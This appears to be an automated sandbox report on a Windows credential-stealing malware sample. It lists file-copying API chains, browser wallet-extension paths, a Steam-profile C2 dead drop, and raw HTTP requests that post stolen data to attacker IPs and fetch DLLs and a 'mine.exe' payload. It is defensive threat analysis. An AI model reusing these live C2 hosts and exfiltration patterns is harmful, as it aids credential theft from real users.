Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003DA2C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_003DA2C0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003E56C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	0_2_003E56C0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003DB390 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003DB390
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003E4F80 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose,	0_2_003E4F80
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003D9D40 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003D9D40
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003E5A70 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	0_2_003E5A70
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003DAAB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_003DAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0040C2E0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_0040C2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00409D40 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_00409D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00401110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_00401110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_004099F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	6_2_004099F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00415A70 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	6_2_00415A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0040A2C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	6_2_0040A2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_004156C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	6_2_004156C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00415EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_00415EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0040AAB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	6_2_0040AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00414F80 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose,	6_2_00414F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0040B390 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_0040B390

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Code function: 0_2_003E53C0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

0_2_003E53C0

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\ProgramData\EHDHIDAEHC.exe

Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h

4_2_05A6D0C8

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199747278259

Downloads executable code via HTTP

Source: global traffic

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 104.102.49.249 104.102.49.249
Source: Joe Sandbox View	IP Address: 38.180.132.96 38.180.132.96
Source: Joe Sandbox View	IP Address: 168.119.176.241 168.119.176.241

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AKAMAI-ASUS AKAMAI-ASUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDBAFIIECBFHIEBKJJKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 278Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAKJDAAFBKFHIEBFCFBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDHIEGCFHCGDGCAECBGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBFHJEGDAFHIJKECFBKJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFBFBGDBKJJKFIEHJDBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 7013Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDBFBFCBFBKECAAKJKFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCFHDAKECFIDGDGDBKJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFHJKEBAAECBFHIECGIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIEBKKFHIEGCAKECGHJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJEHJKJEBGHJJKEBGIEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JECAFHJEGCFCBFIEGCAEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIEHCFIECBGCBFHIJJKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 498Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKKEHJKFCFCBFHIIDGDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDBAFIIECBFHIEBKJJKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 457Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAECUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 99265Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIEHCFIECBGCBFHIJJKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKJEHCGCGDAAAKFHJKJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 278Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJDGCAEBFIIECAKFHIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCAAFBFBKFIDGDHJDBKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIJEHCBAKFCAKFHCGDGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJDGCAEBFIIECAKFHIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 6801Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJDGCAEBFIIECAKFHIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steals/mine.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAKJDAAFBKFHIEBFCFBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: arpdabl.zapto.orgContent-Length: 5865Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.176.241

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

0_2_003D5010

Source: global traffic	HTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
